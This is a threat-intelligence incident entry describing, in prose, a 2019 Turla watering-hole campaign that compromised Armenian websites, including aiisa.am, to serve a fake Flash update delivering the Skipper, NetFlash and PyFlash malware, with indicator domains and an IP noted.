Cyber Incident Victim: The Armenian Institute of International and Security Affairs
Date:
Jan 2019
Location:
Armenia
Summary
The Armenian Institute of International and Security Affairs was targeted in a watering hole campaign where attackers compromised multiple Armenian websites, injecting malicious JavaScript to redirect visitors to a server delivering a fake Adobe Flash update. This social engineering tactic prompted users to download malware, initially deploying the known Turla backdoor Skipper before transitioning to new payloads—NetFlash, a .NET downloader, and PyFlash, a Python-based backdoor. The malware collected system information, established persistence, and communicated with command-and-control servers, facilitating espionage activities against government and political entities. The operation leveraged persistent tracking mechanisms and selective targeting to infect high-value victims.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 2 techniques |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
The Armenian Institute of International and Security Affairs (aiisa.am) was compromised as part of a watering hole campaign attributed to the Turla advanced persistent threat group, active since at least early 2019. Turla operators injected malicious JavaScript code into aiisa.am and three other Armenian websites—armconsul.ru (Armenian Embassy in Russia), mnp.nkr.am (Artsakh Ministry of Nature Protection), and adgf.am (Armenian Deposit Guarantee Fund)—to target government officials and policymakers. The attackers appended obfuscated JavaScript to legitimate site files, such as the jquery-migrate.min.js library, redirecting visitors to a second-stage script hosted on skategirlchina.com. This script deployed browser fingerprinting techniques using an "evercookie" stored across multiple client-side storage mechanisms to track returning visitors. It collected system information—including browser plugins, screen resolution, and OS details—and transmitted it to Turla’s command-and-control (C&C) infrastructure. Only a small subset of visitors triggered further malicious activity, receiving a fraudulent Adobe Flash update prompt via an injected iframe.
The social engineering lure led to the download of a malicious installer that executed both legitimate Flash software and Turla malware. Prior to September 2019, victims received the Skipper backdoor, a known Turla tool distributed via a self-extracting RAR archive. Skipper’s components included a communication module connecting to skategirlchina.com/wp-includes/ms-locale.php. In late August 2019, Turla shifted to delivering NetFlash, a .NET downloader, and PyFlash, a Python-based backdoor compiled via py2exe. NetFlash (winhost.exe) established persistence through scheduled tasks and retrieved PyFlash from hardcoded C&C servers like 134.209.222.206:15363. PyFlash exfiltrated system data—including outputs from systeminfo, ipconfig, and arp commands—via AES-encrypted HTTP communications. ESET researchers detected the campaign through telemetry, confirmed skategirlchina.com ceased malicious operations by November 2019, and notified Armenia’s national CERT prior to public disclosure in March 2020. The compromise enabled sustained espionage against Armenian governmental entities through persistent credential tracking and backdoor deployment.